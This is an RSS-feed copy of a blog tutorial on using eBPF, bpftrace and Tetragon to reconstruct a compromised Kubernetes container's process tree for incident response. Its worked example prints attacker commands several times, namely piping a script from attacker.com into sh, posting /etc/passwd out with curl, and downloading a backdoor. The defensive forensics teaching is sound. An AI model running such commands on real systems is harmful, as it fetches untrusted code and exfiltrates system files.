<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Linux Archives - Linuxcent</title>
	<atom:link href="https://linuxcent.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>https://linuxcent.com/tag/linux/</link>
	<description>Infrastructure security, from the kernel up.</description>
	<lastBuildDate>Wed, 13 May 2026 15:36:58 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://linuxcent.com/wp-content/uploads/2026/04/favicon-512x512-1-150x150.png</url>
	<title>Linux Archives - Linuxcent</title>
	<link>https://linuxcent.com/tag/linux/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">211632295</site>	<item>
		<title>Process Lineage — Reconstructing What Happened After the Fact</title>
		<link>https://linuxcent.com/ebpf-process-lineage-incident-response/</link>
					<comments>https://linuxcent.com/ebpf-process-lineage-incident-response/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 18 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[kprobe]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Process Lineage]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1842</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Reconstruct the full process tree of a compromised container — what it spawned, what files it touched, what connections it made — using eBPF kprobe hooks. Even after the process exits.</p>
<p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 13</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <a href="/dns-kernel-observability/">DNS Observability</a> · <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon</a> · <strong>Process Lineage</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img fetchpriority="high" decoding="async" width="2400" height="2012" src="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png" alt="eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics" class="wp-image-2122" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png 2400w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-300x252.png 300w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1024x858.png 1024w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-768x644.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1536x1288.png 1536w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-2048x1717.png 2048w" sizes="(max-width: 2400px) 100vw, 2400px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp<br />
  <em>(kprobe on fork/exec = an eBPF program that fires every time the kernel&#8217;s <code class="" data-line="">fork()</code> or <code class="" data-line="">execve()</code> system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)</em></li>
<li>Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)</li>
<li>Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream</li>
<li>Reconstructing an incident from process lineage requires: who spawned the attacker&#8217;s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp</li>
<li>Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace</li>
</ul>
<hr />
<p>EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.</p>
<h2 id="quick-check-what-process-events-is-your-cluster-already-recording">Quick Check: What Process Events Is Your Cluster Already Recording?</h2>
<pre><code class="" data-line=""># On any cluster node — verify exec tracing is available
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%-20s %-6d %s\n&quot;, comm, pid, str(args-&gt;filename));
}&#039; --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
</code></pre>
<pre><code class="" data-line=""># If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process_exec&quot;: {
    &quot;process&quot;: {
      &quot;pid&quot;: 18293,
      &quot;binary&quot;: &quot;/bin/sh&quot;,
      &quot;arguments&quot;: &quot;-c health-check.sh&quot;,
      &quot;start_time&quot;: &quot;2026-04-22T09:14:03.412Z&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
      &quot;parent_pid&quot;: 18201
    },
    &quot;parent&quot;: {
      &quot;pid&quot;: 18201,
      &quot;binary&quot;: &quot;/usr/local/bin/my-app&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;}
    }
  }
}
</code></pre>
<p>Each event has the process, its parent, the pod, the namespace, and the full binary path. That&#8217;s the raw material for process lineage reconstruction.</p>
<blockquote>
<p><strong>Not running Tetragon?</strong> Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.</p>
</blockquote>
<hr />
<p>A container in the <code class="" data-line="">payments</code> namespace was reported compromised. The security team&#8217;s automated response had already restarted the pod — the attacker&#8217;s process was gone. The container&#8217;s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.</p>
<p>Three questions, no answers yet:<br />
1. What spawned the attacker&#8217;s process? (was it a remote code execution in the app, or a misconfigured exec?)<br />
2. What did the attacker run after getting in? (what did they download, execute, touch?)<br />
3. What network connections did they make? (where did data go, if anywhere?)</p>
<p>The answers were in Tetragon&#8217;s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn&#8217;t touch that record.</p>
<p>The lineage showed:</p>
<pre><code class="" data-line="">my-app (PID 18201)
  └── sh -c &quot;curl http://attacker.com/payload.sh | sh&quot;  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)
</code></pre>
<p>Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.</p>
<hr />
<h2 id="how-the-kernel-tracks-process-identity">How the Kernel Tracks Process Identity</h2>
<p>Every process in Linux is represented by a <code class="" data-line="">task_struct</code> — the kernel&#8217;s internal data structure for a running process. It contains everything the kernel knows about that process.</p>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code></strong> — the kernel&#8217;s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent <code class="" data-line="">task_struct</code>. When bpftrace uses <code class="" data-line="">curtask</code>, it&#8217;s returning a pointer to the current process&#8217;s <code class="" data-line="">task_struct</code>. Reading <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> gives you the parent&#8217;s PID — the foundation of process lineage.</p>
</blockquote>
<p>When a process calls <code class="" data-line="">fork()</code>, the kernel:<br />
1. Allocates a new <code class="" data-line="">task_struct</code> for the child<br />
2. Copies the parent&#8217;s <code class="" data-line="">task_struct</code> fields into the child<br />
3. Sets the child&#8217;s <code class="" data-line="">real_parent</code> pointer to the parent&#8217;s <code class="" data-line="">task_struct</code><br />
4. Assigns the child a new PID<br />
5. Returns the child&#8217;s PID to the parent, and 0 to the child</p>
<p>When the child calls <code class="" data-line="">execve()</code>, the kernel:<br />
1. Validates the binary (verifier/capability checks, LSM hooks)<br />
2. Replaces the process&#8217;s memory image with the new binary<br />
3. Updates <code class="" data-line="">task_struct-&gt;comm</code> with the new process name<br />
4. The PID does not change — <code class="" data-line="">execve</code> replaces the process image but not the process identity</p>
<p>This <code class="" data-line="">fork</code> → <code class="" data-line="">exec</code> sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.</p>
<hr />
<h2 id="building-the-process-tree-with-kprobes">Building the Process Tree with kprobes</h2>
<p>The two core hooks for process lineage:</p>
<pre><code class="" data-line=""># Every fork — capture parent/child relationship
bpftrace -e &#039;
tracepoint:syscalls:sys_exit_clone {
    if (retval &gt; 0) {
        # retval is the child PID (from parent&#039;s perspective)
        printf(&quot;FORK parent=%-6d child=%-6d parent_comm=%-20s\n&quot;,
               pid, retval, comm);
    }
}&#039;
</code></pre>
<pre><code class="" data-line=""># Every exec — capture what binary replaced the process image
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n&quot;,
           pid,
           curtask-&gt;real_parent-&gt;tgid,
           str(args-&gt;filename),
           str(*args-&gt;argv));
}&#039;
</code></pre>
<p>Combined output (30 seconds, simplified):</p>
<pre><code class="" data-line="">FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd
</code></pre>
<p>Each line is a kernel event. The parent/child PID chain is the tree. Rendered:</p>
<pre><code class="" data-line="">my-app (18201)
  └── sh (18293) — &quot;sh -c curl http://attacker.com/payload.sh | sh&quot;
        └── sh (18294) — &quot;sh payload.sh&quot;
              ├── cat (18295) — &quot;/etc/passwd&quot;
              └── curl (18296) — &quot;http://attacker.com/exfil -d @/etc/passwd&quot;
</code></pre>
<p>This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.</p>
<hr />
<h2 id="how-tetragon-stores-the-process-tree-in-bpf-maps">How Tetragon Stores the Process Tree in BPF Maps</h2>
<p>bpftrace&#8217;s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.</p>
<pre><code class="" data-line="">Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code> in BPF maps</strong> — Tetragon doesn&#8217;t store the raw <code class="" data-line="">task_struct</code> pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.</p>
</blockquote>
<p>To inspect Tetragon&#8217;s process cache directly:</p>
<pre><code class="" data-line=""># Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     &quot;key&quot;: 18293,                           # ← PID
#     &quot;value&quot;: {
#         &quot;binary&quot;: &quot;/bin/sh&quot;,
#         &quot;args&quot;: &quot;sh -c curl http://...&quot;,
#         &quot;pid&quot;: 18293,
#         &quot;ppid&quot;: 18201,
#         &quot;uid&quot;: 1000,
#         &quot;start_time&quot;: 1745296443,
#         &quot;cgroup&quot;: &quot;kubepods/burstable/pod3f8a21bc/.../payments&quot;
#     }
# }]
</code></pre>
<p>The <code class="" data-line="">cgroup</code> field maps directly to the pod — same path as <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> but captured at exec time and stored in kernel space.</p>
<hr />
<h2 id="correlating-files-and-connections-to-the-process-tree">Correlating Files and Connections to the Process Tree</h2>
<p>Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon&#8217;s TracingPolicy supports this multi-event correlation natively:</p>
<pre><code class="" data-line="">apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: &quot;security_inode_permission&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;inode&quot;
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: &quot;NotIn&quot;
              values: [&quot;1&quot;]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don&#039;t block
    - call: &quot;tcp_connect&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;sock&quot;
      selectors:
        - matchActions:
            - action: Post
</code></pre>
<p>With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:</p>
<pre><code class="" data-line="">tetra getevents | jq &#039;select(.process_kprobe.function_name == &quot;tcp_connect&quot;) |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}&#039;
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">{&quot;pid&quot;: 18296, &quot;binary&quot;: &quot;/usr/bin/curl&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
{&quot;pid&quot;: 18297, &quot;binary&quot;: &quot;/usr/bin/wget&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
</code></pre>
<p>PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the <code class="" data-line="">curl</code> and <code class="" data-line="">wget</code> spawned by the attacker&#8217;s payload script. The destination IP is the attacker&#8217;s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.</p>
<hr />
<h2 id="building-process-lineage-without-tetragon">Building Process Lineage Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:</p>
<pre><code class="" data-line=""># Record all exec events to a file — run in the background on the node
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%llu EXEC pid=%-6d ppid=%-6d binary=%s\n&quot;,
           nsecs, pid, curtask-&gt;real_parent-&gt;tgid, str(args-&gt;filename));
}
tracepoint:sched:sched_process_exit {
    printf(&quot;%llu EXIT pid=%-6d comm=%s\n&quot;, nsecs, pid, comm);
}
&#039; &gt; /var/log/process-lineage.log &amp;

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
</code></pre>
<p>This file survives pod restarts because it&#8217;s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by <code class="" data-line="">ppid</code> and ordering by timestamp.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Ringbuf saturation on high-process-churn nodes.</strong> Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon&#8217;s namespace selector does this filtering in the eBPF program before the write.</p>
<p><strong>The 15-character <code class="" data-line="">comm</code> truncation.</strong> The <code class="" data-line="">comm</code> field in <code class="" data-line="">task_struct</code> is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. <code class="" data-line="">bpftrace</code>&#8216;s <code class="" data-line="">comm</code> built-in has the same limit. For the full binary path, read from <code class="" data-line="">execve</code>&#8216;s <code class="" data-line="">filename</code> argument at the tracepoint, not from <code class="" data-line="">comm</code>.</p>
<p><strong>PID reuse.</strong> Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon&#8217;s process cache keys on PID + start time to handle this.</p>
<p><strong>Exec chains lose argument history.</strong> When <code class="" data-line="">execve</code> replaces the process image, <code class="" data-line="">task_struct-&gt;comm</code> changes but the PID does not. If the attacker&#8217;s shell runs <code class="" data-line="">exec bash</code> to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don&#8217;t rely on <code class="" data-line="">comm</code> alone for process identity; always track the binary path from the exec event.</p>
<p><strong>Process events don&#8217;t capture file content.</strong> You see that <code class="" data-line="">/bin/cat /etc/passwd</code> ran. You don&#8217;t see what was in <code class="" data-line="">/etc/passwd</code> at that moment unless you also capture file open/read events. Tetragon&#8217;s <code class="" data-line="">security_inode_permission</code> hook tells you which files were accessed; capturing their content requires additional hooks on <code class="" data-line="">vfs_read</code> with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>Live exec trace (bpftrace)</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_execve { printf(...) }&#039;</code></td>
</tr>
<tr>
<td>Fork + exec tree</td>
<td>Combine <code class="" data-line="">sys_exit_clone</code> + <code class="" data-line="">sys_enter_execve</code> traces, correlate by pid/ppid</td>
</tr>
<tr>
<td>Tetragon process events</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_EXEC</code></td>
</tr>
<tr>
<td>Tetragon file + network</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>Process cache map</td>
<td><code class="" data-line="">bpftool map list | grep process_cache</code> → <code class="" data-line="">bpftool map dump id N</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID</td>
</tr>
<tr>
<td>Process exit events</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Process event</th>
<th>Kernel hook</th>
</tr>
</thead>
<tbody>
<tr>
<td>New process spawned</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_exit_clone</code> (retval &gt; 0 = child PID)</td>
</tr>
<tr>
<td>Binary executed</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_execve</code></td>
</tr>
<tr>
<td>Process exited</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
<tr>
<td>File opened</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_openat</code></td>
</tr>
<tr>
<td>Network connect</td>
<td><code class="" data-line="">kprobe:tcp_connect</code></td>
</tr>
<tr>
<td>DNS query</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_sendto</code> (port 53)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed</li>
<li>Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted</li>
<li>Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism</li>
<li>PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events</li>
<li>Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP14 is the payoff episode for the entire series arc so far. You&#8217;ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).</p>
<p>EP14 synthesises all of it into four commands that tell you everything about any cluster you&#8217;ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what&#8217;s enforcing policy at the kernel level before you can trust anything it tells you.</p>
<p><em>Next: <a href="/ebpf-audit-playbook/">the audit playbook — four commands to see any cluster</a></em></p>
<p>Get EP14 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-process-lineage-incident-response%2F&amp;linkname=Process%20Lineage%20%E2%80%94%20Reconstructing%20What%20Happened%20After%20the%20Fact" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" 